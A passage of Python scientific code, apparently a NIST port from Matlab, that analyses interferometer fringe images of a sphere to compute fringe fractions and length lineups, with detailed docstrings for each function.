Ri - Ri.mean()\r\n\r\n center_est = x.mean(), y.mean()\r\n center_2, _ = optimize.leastsq(f_2, center_est)\r\n xc_2, yc_2 = center_2\r\n Ri_2 = calc_R(*center_2)\r\n R_2 = Ri_2.mean()\r\n\r\n return xc_2, yc_2, R_2\r\n\r\ndef drawcircle(xc, yc, r, axesid):\r\n \"\"\"\r\n drawcircle.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n Plot circle on given figure with x- and y-center coordinates with radius r. pixels\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -xc - center in x, pixels\r\n -yc - center in y, pixels\r\n -r - radius, pixels\r\n -axesid- axes ID\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - (x,y) of circle\r\n - radius of circle\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from v1.00 to v1.00\r\n June 13, 2018\r\n -initial version. NOT port of drawcircle.m\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n circle = plt.Circle((xc, yc), r, edgecolor='C2', facecolor='C0', alpha=0.25)\r\n axesid.add_patch(circle)\r\n cpause(0.0001)\r\n\r\ndef ballimagegen(datain):\r\n \"\"\"\r\n ballimagegen.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n generate image of sphere from changing fringe images\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -data containing fringe images and measuring forces, data structure format\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -image of ball shadow\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.003 to v1.00\r\n June 20, 2018\r\n -converted from ballimagegen.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n print('\\nCalculating ball image shadow via fringe pitching...\\n')\r\n Fchange = 4. #combine image when recorded force changes by Fchange grams or more\r\n previousF = 1\r\n _, no_forces = np.shape(datain['data'])\r\n data_cp = copy.deepcopy(datain)\r\n MeasForce = np.zeros((no_forces, 2))\r\n for i in range(0, no_forces):\r\n MeasForce[i, :] = [data_cp['data'][0, i].MeasForce, i]\r\n MeasForce = MeasForce[MeasForce[:, 0].argsort()]\r\n for i in range(0, no_forces):\r\n data_cp['data'][0, i].FringeImage = datain['data'][0, int(MeasForce[i, 1])].FringeImage\r\n data_cp['data'][0, i].MeasForce = datain['data'][0, int(MeasForce[i, 1])].MeasForce\r\n im_combined = data_cp['data'][0, 0].FringeImage.astype(float) #load first fringeimage to begin combining images\r\n count = 1\r\n for i in range(1, no_forces):\r\n if (float(data_cp['data'][0, i].MeasForce) - float(data_cp['data'][0, previousF].MeasForce)) >= Fchange:\r\n im_combined = im_combined + data_cp['data'][0, i].FringeImage.astype(float)\r\n count += 1\r\n previousF = i\r\n im_combined = im_combined / count\r\n del data_cp\r\n\r\n return im_combined\r\n\r\ndef fringescan(fringeimage, X_top, Y_top, X_endtop, Y_endtop, dy_scan, n_I, I_cutoff, automode, pf_top_line): #pylint: disable=R0913, R0914, R0912, R0915\r\n \"\"\"\r\n fringescan.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n from scan endpoints, determine center of a destructive fringe\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -fringe analysis paper\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -fringeimage - 2D matrix image\r\n -X_top - array of startpoints for fringe scan in x\r\n -Y_top - array of startpoints for fringe scan in y\r\n -X_endtop - array of endpoints for fringe scan in x\r\n -Y_endtop - array of endpoints for fringe scan in x\r\n -dy_scan - height of scan in y\r\n -n_I - number of intensity values\r\n -I_cutoff - intensity cutoff value\r\n -automode - selection of automode\r\n -pf_top_line - fit, for use with automode. set 0 if not using automode\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - center_top - matrix of fringe centers, (x,y)\r\n - pf_top_line - fit through fringe centers\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.062 to v1.00\r\n June 14, 2018\r\n -converted from fringescan.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n I_gap = 2\r\n X_top = np.round(X_top) #round points to prevent subscript errors\r\n Y_top = np.round(Y_top)\r\n X_endtop = np.round(X_endtop)\r\n Y_endtop = np.round(Y_endtop)\r\n n_scans = sum(X_endtop - X_top) #number of scan points is equivalent to total number of horizontal pixels selected\r\n I_top = np.zeros((n_I.astype(int), n_scans.astype(int))) #pad I_top with zeros\r\n X_top_pts = np.zeros((n_I.astype(int), n_scans.astype(int)))\r\n Y_top_pts = np.zeros((n_I.astype(int), n_scans.astype(int)))\r\n if automode == 'off':\r\n pf_top_line = np.polyfit([X_top[0], X_endtop[-1]], [Y_top[0], Y_endtop[-1]], 1)\r\n if abs(1/pf_top_line[0]) > 1e9: #if slope of perpendicular starts approaching infinity\r\n pf_top_line[0] = 1/1e9 #very slightly angle the slope to prevent Inf errors in perpendicular line\r\n\r\n # scan fringes at approximately normal\r\n j = 0\r\n n = 1\r\n for i, X_top_val in enumerate(X_top):\r\n dy = (Y_endtop[i] - Y_top[i])/(X_endtop[i] - X_top_val) #change in y for each scan box\r\n x = X_top_val #first scan center point\r\n y = Y_top[i]\r\n while x < X_endtop[i]:\r\n perp_pf_top_line = [-1/pf_top_line[0], (y + 1/pf_top_line[0]*x)] #calculate perpendicular to line at each scan center\r\n perp_pfy_top_line = [1/perp_pf_top_line[0], -perp_pf_top_line[1]/perp_pf_top_line[0]] #calculate x = (y-b)/m line\r\n y_scan = np.round(np.linspace(y-dy_scan, y+dy_scan, n_I)) #y points for the scan\r\n x_scan = np.round(np.polyval(perp_pfy_top_line, y_scan)) #calculate x points based on the y points, round to prevent subscript errors\r\n for a, y_scan_val in enumerate(y_scan): #scan across fringe at angle in matrix\r\n I_top[a, j] = fringeimage[y_scan_val.astype(int), x_scan[a].astype(int)]\r\n X_top_pts[:, j] = x_scan #create x and y points for the scan\r\n Y_top_pts[:, j] = y_scan\r\n y = Y_top[i] + np.round(n*dy) #generate next scan center point\r\n x += 1\r\n j += 1\r\n n += 1\r\n n = 1 #reset n\r\n\r\n # Top fringe center finder: approximating to quadratic function\r\n _, n_scans = np.shape(X_top_pts)\r\n center_top = np.zeros((n_scans, 2))\r\n for i in range(0, n_scans):\r\n removed = I_top[:, i] < I_cutoff #find where intensity drops below cutoff\r\n removed2_index = np.diff(removed) >= I_gap #find any gaps >= I_gap\r\n removed2 = np.array([])\r\n for j, removed2_val in enumerate(removed2_index):\r\n if removed2_val <= np.round(len(removed)/2):\r\n removed2 = np.array([])\r\n removed2 = removed[removed2_val::]\r\n jmin = removed2_val\r\n elif removed2_val > np.round(len(removed)/2):\r\n if not removed2.any():\r\n removed2 = removed[0:removed2_val]\r\n else:\r\n removed2 = removed[jmin:removed2_val]\r\n break\r\n if not removed2.any():\r\n removed = removed2\r\n pf_Itop = np.polyfit(Y_top_pts[removed, i], I_top[removed, i], 2) #fit intensity data to quadratic\r\n dfdy = [2*pf_Itop[0], pf_Itop[1]] #derivative of intensity profile fit\r\n center_top[i, 1] = np.roots(dfdy) #calculate where dfdy is zero\r\n pf_scan = np.polyfit(Y_top_pts[:, i], X_top_pts[:, i], 1) #calculate line for scan\r\n center_top[i, 0] = np.polyval(pf_scan, center_top[i, 1]) #calculate position of x-center\r\n j = np.where(center_top[:, 0] == 0)[0] #if coordinates were 0,0, delete\r\n center_top = np.delete(center_top, j, axis=0)\r\n pf_top_line = np.polyfit(center_top[:, 0], center_top[:, 1], 1) #fit line to fringe centers\r\n\r\n # Redo fringe scans and fits with scans nearly normal to fringe\r\n if abs(1/pf_top_line[0] > 1e9): #if slope of perpendicular starts approaching infinity\r\n pf_top_line[0] = 1/1e9 #very slightly angle the slope to prevent Inf errors in perpendicular line\r\n j = 0\r\n n = 1\r\n for i, X_top_val in enumerate(X_top):\r\n dy = (Y_endtop[i] - Y_top[i])/(X_endtop[i] - X_top[i]) #change in y for each scan box\r\n x = X_top[i] #first scan center point\r\n y = Y_top[i]\r\n while x < X_endtop[i]:\r\n perp_pf_top_line = [-1/pf_top_line[0], (y + 1/pf_top_line[0]*x)] #calculate perpendicular to line at each scan center\r\n perp_pfy_top_line = [1/perp_pf_top_line[0], -perp_pf_top_line[1]/perp_pf_top_line[0]] #calculate x = (y-b)/m line\r\n y_scan = np.round(np.linspace(y-dy_scan, y+dy_scan, n_I)) #y points for the scan\r\n x_scan = np.round(np.polyval(perp_pfy_top_line, y_scan)) #calculate x points based on the y points, round to prevent subscript errors\r\n for a, y_scan_val in enumerate(y_scan): #scan across fringe at angle in matrix\r\n I_top[a, j] = fringeimage[y_scan[a].astype(int), x_scan[a].astype(int)]\r\n X_top_pts[:, j] = x_scan #create x and y points for the scan\r\n Y_top_pts[:, j] = y_scan\r\n y = Y_top[i] + np.round(n*dy) #generate next scan center point\r\n x += 1\r\n j += 1\r\n n += 1\r\n n = 1 #reset n\r\n # Top fringe center finder\r\n # fit fringe intensity profile to polynomial, f(x), find where df/dx = 0\r\n _, n_scans = np.shape(X_top_pts)\r\n center_top = np.zeros((n_scans, 2))\r\n for i in range(0, n_scans):\r\n removed = I_top[:, i] < I_cutoff #find where intensity drops below cutoff\r\n removed2_index = np.diff(removed) >= I_gap #find any gaps >= I_gap\r\n removed2 = np.array([])\r\n for j, removed2_val in enumerate(removed2_index):\r\n if removed2_val <= np.round(len(removed)/2):\r\n removed2 = np.array([])\r\n removed2 = removed[removed2_val::]\r\n jmin = removed2_val\r\n elif removed2_val > np.round(len(removed)/2):\r\n if not removed2.any():\r\n removed2 = removed[0:removed2_val]\r\n else:\r\n removed2 = removed[jmin:removed2_val]\r\n break\r\n if not removed2.any():\r\n removed = removed2\r\n pf_Itop = np.polyfit(Y_top_pts[removed, i], I_top[removed, i], 2) #fit intensity data to quadratic\r\n dfdy = [2*pf_Itop[0], pf_Itop[1]] #derivative of intensity profile fit\r\n center_top[i, 1] = np.roots(dfdy) #calculate where dfdy is zero\r\n pf_scan = np.polyfit(Y_top_pts[:, i], X_top_pts[:, i], 1) #calculate line for scan\r\n center_top[i, 0] = np.polyval(pf_scan, center_top[i, 1]) #calculate position of x-center\r\n j = np.where(center_top[:, 0] == 0)[0] #if coordinates were 0,0, delete\r\n center_top = np.delete(center_top, j, axis=0)\r\n pf_top_line = np.polyfit(center_top[:, 0], center_top[:, 1], 1) #fit line to fringe centers\r\n\r\n return center_top, pf_top_line\r\n\r\ndef minpt2crv(pf, xo, yo):\r\n \"\"\"\r\n fringescan.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n calculate location on 2nd-order polynomial (ax^2 + bx + c) where point (xo, yo) is closest\r\n used for approximation of a line through a point normal to given 2nd-order polynomial\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -a, b, c - coefficients of polynomial ax^2 + bx + c\r\n -xo - x-location of point\r\n -yo - y-location of point\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -z, location in x of point\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.0 to v1.00\r\n June 20, 2018\r\n -converted from minpt2crv.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n A = 4*pf[0]**2\r\n B = 6*pf[0]*pf[1]\r\n C = -4*pf[0]*yo + 4*pf[0]*pf[2] + 2*pf[1]**2 + 2\r\n D = -2*pf[1]*yo - 2*xo + 2*pf[1]*pf[2]\r\n\r\n def df(x, A, B, C, D):\r\n \"\"\"\r\n internal function for minpt2crv, calculates derivative\r\n \"\"\"\r\n return A*x**3 + B*x**2 + C*x + D\r\n\r\n z = optimize.fsolve(df, xo, args=(A, B, C, D))\r\n\r\n return z\r\n\r\ndef FFanalysis(pf_top, pf_bot, xc, yc, x_res): #pylint: disable=R0914, R0912\r\n \"\"\"\r\n FFanalysis.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n calculate fringe fraction from polyfit curves to fringe centers\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.003 to v1.00\r\n June 20, 2018\r\n -converted from FFanalysis.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n\r\n # Top fringe, find point nearest to curve\r\n near_top = np.zeros((1, 2))\r\n near_bot = np.zeros((1, 2))\r\n\r\n near_top[0, 0] = minpt2crv(pf_top, xc, yc) #minimize point to polynomial distance in x\r\n near_top[0, 1] = np.polyval(pf_top, near_top[0, 0]) #calculate point in y\r\n # Bottom fringe, find point nearest to curve\r\n near_bot[0, 0] = minpt2crv(pf_bot, xc, yc) #minimize point to polynomial distance in y\r\n near_bot[0, 1] = np.polyval(pf_bot, near_bot[0, 0]) #calculate point in y\r\n\r\n # fringe fraction nearly normal to fringes (average of slopes)\r\n # calculate derivative of polynomial and tangent line at point\r\n dpf_top = [2*pf_top[0], pf_top[1]] #derivative of polynomial fit of top fringe\r\n mTTop = np.polyval(dpf_top, near_top[0, 0]) #slope of tangent\r\n perp_top_tan = np.array([-1/mTTop, (yc + 1/mTTop*xc)]) #line of top perpendicular to tangent through ball center\r\n\r\n dpf_bot = [2*pf_bot[0], pf_bot[1]] #derivative of polnomial fit of bottom fringe\r\n mTBot = np.polyval(dpf_bot, near_bot[0, 0]) #slope of tangent\r\n perp_bot_tan = np.array([-1/mTBot, yc + 1/mTBot*xc]) #line of bottom perpendicular to tangent through ball center\r\n # check if perpendicular projections are opposing vectors. if so, invert one (bottom)\r\n if (perp_top_tan[0] > 0 and perp_bot_tan[0] < 0) or (perp_top_tan[0] < 0 and perp_bot_tan[0] > 0):\r\n if (perp_top_tan[1] > 0 and perp_bot_tan[1] < 0) or (perp_top_tan[1] < 0 and perp_bot_tan[1] > 0):\r\n perp_bot_tan = np.array([1/mTBot, (yc - 1/mTBot*xc)])\r\n avg_perp = (perp_top_tan + perp_bot_tan)/2 #average perpendicular to tangent through ball center\r\n avg_perp = np.append(0, avg_perp)\r\n\r\n T = np.roots(pf_top - avg_perp) #find intersection of perp tangent and fringe profile\r\n B = np.roots(pf_bot - avg_perp)\r\n # check which intersection point lines within range of image\r\n if len(T) >= 2:\r\n # check if top intersection lies within range of image\r\n if T[0] > 0 and T[0] < x_res:\r\n T = np.delete(T, 1)\r\n elif T[1] > 0 and T[1] < x_res:\r\n T[0] = T[1]\r\n T = np.delete(T, 1)\r\n else:\r\n raise ValueError('Top perpendicular intersection of fringe fit and FF evaluation axis not found.')\r\n\r\n if B[0] > 0 and B[0] < x_res:\r\n B = np.delete(B, 1)\r\n elif B[1] > 0 and B[1] < x_res:\r\n B[0] = B[1]\r\n B = np.delete(B, 1)\r\n else:\r\n raise ValueError('Bottom perpendicular intersection of fringe fit and FF evaluation axis not found.')\r\n\r\n else:\r\n if T < 0 or T > x_res:\r\n raise ValueError('Top perpendicular intersection of fringe fit and FF evaluation axis not found.')\r\n if B < 0 or B > x_res:\r\n raise ValueError('Bottom perpendicular intersection of fringe fit and FF evaluation axis not found.')\r\n dist_TB = ((T - B)**2 + (np.polyval(avg_perp, T) - np.polyval(avg_perp, B))**2)**(1/2) #calculate distance between top and bottom fringe along average perp\r\n dist_CB = ((xc - B)**2 + (yc - np.polyval(avg_perp, B))**2)**(1/2) #calculate distance between ball center and bottom fringe\r\n FFexact = dist_CB/dist_TB #fringe fraction is then the ratio between ball center to bottom and top to bottom\r\n if yc > np.polyval(avg_perp, B): #if ball center was below bottom fringe\r\n FFexact = -FFexact #display as negative\r\n\r\n return FFexact, avg_perp\r\n\r\ndef strang_autolineup(ball_results): #pylint: disable=R0914\r\n \"\"\"\r\n strang_autolineup.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n Calculates lineup of a ball in deformed state from strangviewer interferometer, corrected to 20 deg. C\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -verified against Wei Ren's (NIST) Gage Block: Spectrum softare to within 0.10 nm lineup\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -ball_results, dictionary containing environment conditions and fringe fraction results\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -lineup_const - constructive interference lineup, nm\r\n -m_modifier - modifier to add to lineups to shift to another fringe order\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.14 to v1.00\r\n June 20, 2018\r\n -converted from strang_autolineup.m to replicate behavior\r\n -removed output of deformation and measurement forces\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n # load variables from ball_rersults input\r\n lambda_air = np.zeros(np.shape(ball_results['T_matl']))\r\n no_images, no_forces = np.shape(ball_results['T_matl'])\r\n\r\n with open(fringefinderfuncs_directory+'/laser_wavelengths.csv') as laserfile:\r\n reader = csv.reader(laserfile, delimiter=',') #read laser vacuum wavelengths and obliquity\r\n laserfiledata = list(zip(*reader))\r\n lambda_vac = float(laserfiledata[1][laserfiledata[0].index('strang_HeNe')])\r\n slitobliq = float(laserfiledata[1][laserfiledata[0].index('strang2_slitobliq')]) #strang #2 slit and obliquity, ppm (nm/mm)\r\n\r\n for i in range(0, no_images):\r\n for j in range(0, no_forces):\r\n lambda_air[i, j] = wavelength_air(ball_results['T_air'][i, j], ball_results['RH_air'][i, j], ball_results['P_air'][i, j], lambda_vac)\r\n\r\n balldev = ball_results['ballnomdev'] - ball_results['def_top'] - ball_results['def_bot']\r\n L = ball_results['ballnom'] + ball_results['ballnomdev']/1e6 #best known ball size, mm\r\n\r\n # constructive fringe\r\n # L = m(lambda/2)\r\n m_const = np.floor(2*L/(lambda_air/1e6)) #calculate fringe order\r\n # calculate nominal deviation lineup in nanometers\r\n lineup_const = (((m_const*lambda_air/2 + lambda_air/2*(ball_results['FFexact_all']/100))/1e6 - ball_results['dL_T'] + slitobliq*ball_results['ballnom']/1e6 - ball_results['ballnom'])*1e6) #calculate constructive interference lineup\r\n lineup_const_shifted = ((((m_const + 1)*lambda_air/2 + lambda_air/2*(ball_results['FFexact_all']/100))/1e6 - ball_results['dL_T'] + slitobliq*ball_results['ballnom']/1e6 - ball_results['ballnom'])*1e6) #calculate constructive interference lineup shifted by 1 fringe order\r\n m_modifier = sum(np.sum(lineup_const_shifted - lineup_const, axis=0) / no_images)/no_forces #calculate average distance between consecutive fringe orders\r\n\r\n # compare lineup to balldev, if difference is greater than (m_modifier/2), shift lineup by +/- m_modifier\r\n for i in range(0, no_images): #shift rest of the image lineup per force\r\n for j in range(0, no_forces): #shift first image lineup per force first\r\n err = 1\r\n while abs(lineup_const[i, j] - balldev[i, j]) >= m_modifier/2:\r\n if (lineup_const[i, j] - balldev[i, j]) >= m_modifier/2:\r\n lineup_const[i, j] = lineup_const[i, j] - m_modifier\r\n elif abs(lineup_const[i, j] - balldev[i, j]) >= m_modifier/2 and (lineup_const[i, j] - balldev[i, j]) < 0:\r\n lineup_const[i, j] = lineup_const[i, j] + m_modifier\r\n err += 1 #while breakout\r\n if err > 100:\r\n raise ValueError('Too many fringe order shift iterations (>100) in solving lineup_const')\r\n\r\n # %destructive fringe\r\n # % L = (m+1/2)(lambda/2)\r\n # % m_dest = floor(2*L/(lambda_air/1e6)) + 1/2;\r\n # %lineup_dest = (m_dest*lambda_air/2 + lambda_air/2*(FF/100))/1e6 - dL_T + slitobliq*L/1e6 - ballnom;\r\n\r\n # store slope, if residuals < 10 nm (good F^(2/3) fit)\r\n # pf_force_lineup_residuals = lineup_const - polyval(pf_force_lineup, meas_forces23)\r\n # if max(abs(pf_force_lineup_residuals)) < 10:\r\n # #this was unfinished in MATLAB, too\r\n # end\r\n\r\n return lineup_const, m_modifier\r\n\r\ndef Make2DMatlike(w, h):\r\n \"\"\"\r\n Make2DMatlike.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n July, 2018\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n create a 2D Matlab-like data structure. Once saved with scipy.io.savemat, it can be accessed like a Matlab .mat file in Matlab or Python\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -w - width of matrix, columns\r\n -h - height of matrix, rows\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -list of list of dictionaries sized w by h\r\n assign dictionary key and value using A['data'][r][c][key] = value\r\n get value using A['data'][r][c][key]\r\n once A is saved with scipy.io.savemat, values can be assigned using above OR A['data'][r, c].key\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from v1.00 to v1.00\r\n July 4, 2018\r\n -initial version\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n return {'data' : [[{} for x in range(h)] for y in range(w)]}\r\n\r\ndef filter_conv(arrayin, width):\r\n \"\"\"\r\n filter_conv.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n July, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n convolution filter - filter a data point in array based on value of surrounding data points. useful for averaging random noise\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -Coordinate Measuring Machines and Systems (Bob Hocken) book\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -array - 1D array of data points\r\n -width - width of data points in array to apply filter. only positive nonzero integers. only odd numbers\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -conv_array - convoluted array\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.00 to v1.00\r\n July 7, 2018\r\n -converted from filter_conv.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n # check if width is positive nonzero integer\r\n if not isinstance(width, int) or width <= 0:\r\n raise ValueError('Width of filter must be positive and nonzero integer.')\r\n\r\n # check if width is odd number\r\n if width%2 == 0:\r\n raise ValueError('Width of filter must be an odd number.')\r\n\r\n width_half = int((width - 1)/2)\r\n conv_array = np.zeros((len(arrayin)))\r\n for i in range(0, len(arrayin)):\r\n if i <= width_half:\r\n left = 0\r\n right = i+width_half+1\r\n elif len(arrayin) - i <= width_half:\r\n left = i - width_half\r\n right = len(arrayin)\r\n else:\r\n left = i - width_half\r\n right = i + width_half+1\r\n conv_array[i] = sum(arrayin[slice(left, right)])/len(np.arange(left, right))\r\n return conv_array\r\n\r\ndef fringe_autoscan(fringeimage, I_drop, I_max, n_nodes, xc, yc, r, allmode, xymbloop): #not too many statements, branches, variables, arguments. leave me be, pylint: disable=R0913, R0914, R0912, R0915\r\n \"\"\"\r\n fringe_autoscan.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n July, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n generate scan nodes and calculate fringe positions and orientations\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -fringeimage - fringe pattern image in uint8 format\r\n -I_drop - amount of intensity drop (8 bit) to determine edge of fringe region, for approximate fringe location\r\n -I_max - maximuum intensity for destructive fringe determination, for approximate fringe location\r\n -n_nodes - number of verical scan nodes\r\n -xc - center of ball in x (horizontal)\r\n -yc - center of ball in y (vertical)\r\n -allmode - string toggle, 'all' or 'center', output all fringes or only two fringes surrounding ball center\r\n -xymbloopint - intersection coordinates of loop stem-bal shadow, and mx+b equation for each side of loop stem [leftx lefty leftm leftb; rightx righty rightm rightb]\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -fringe - dictionary, each fringe(n) containts information for each destructive fringe\r\n fringe[n]['center'] - center of node in (x,y)\r\n fringe[n]['X_top'] - locations of node start scans in X\r\n fringe[n]['Y_top'] - locations of node start scans in Y\r\n fringe[n]['X_endtop'] - locations of node end scans in X\r\n fringe[n]['Y_endtop'] - locations of node end scans in Y\r\n fringe[n]['pf_fringe'] - first order polynomial fit of nth fringes\r\n scan_width - width of each node in pixels\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.017 to v1.000\r\n July 4, 2018\r\n -converted from fringe_autoscan.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n # Variables\r\n Iwidth_min = 10 #default 10 #minimum pixel width of I_drop\r\n scan_increase = 0.5 #default 0.75\r\n rx_avoid = 25 #default 25 #number of pixels in x from ball shadow to avoid\r\n ry_avoid = 30 #default 50 #number of pixels in y from ball shadow to avoid\r\n edge_avoid = 15 #default 20\r\n node_fringe_min = 4 #minimum number of nodes on a fringe\r\n loop_avoid = 20 #number of pixels in x from loop shadow to avoid\r\n y_res, x_res = np.shape(fringeimage)\r\n node_width = np.round(x_res/n_nodes) #width of each node, pixels\r\n py = np.arange(0, y_res)\r\n\r\n # Detect fringe locations surrounding ball center\r\n # scan every 1/n_nodes horizontal of image\r\n # filter drops that are less than Iwidth_min pixels\r\n # determine approximate fringe center\r\n scan = {}\r\n center_approx = {}\r\n index_new = {}\r\n for i in range(1, n_nodes): #lots of nests are ok if they work, pylint: disable=R1702\r\n scan[str(i-1)] = [np.linspace(np.round((i)/n_nodes*x_res - 1/(2*n_nodes)*x_res), np.round(i/n_nodes*x_res - 1/(2*n_nodes)*x_res), y_res).astype(int), np.linspace(0, y_res-1, y_res).astype(int)]\r\n ytest = []\r\n #if within region of ball shadow, remove node\r\n if (scan[str(i-1)][0] > (xc - r - rx_avoid)).any() and (scan[str(i-1)][0] < (xc + r + rx_avoid)).any(): #remove square area around (xc,yc) + r + rx/y_avoid\r\n ytest = np.arange(np.round(yc - r - ry_avoid), np.round(yc + r + ry_avoid))\r\n\r\n if sum(xymbloop) != 0: #if loop region exists and node is within region, remove scans in that region\r\n if xymbloop[1] < yc:\r\n raise ValueError('There is not a case for ball loop above sphere in image.')\r\n Lloop_xvals = min(np.round((py[py > xymbloop[1]] - xymbloop[3])/xymbloop[2]))\r\n Rloop_xvals = min(np.round((py[py > xymbloop[5]] - xymbloop[7])/xymbloop[6]))\r\n if scan[str(i-1)][0][0] > (Lloop_xvals - loop_avoid) and scan[str(i-1)][0][0] < (Rloop_xvals + loop_avoid): #if scan(i) falls within loop x-range\r\n AL = [[xymbloop[2], -1], #coefficient matrix\r\n [1, 0]]\r\n BL = [[-xymbloop[3]], #parameter matrix\r\n [scan[str(i-1)][0][0]]]\r\n Lloopint, _, _, _ = np.linalg.lstsq(AL, BL, rcond=None) #solve for 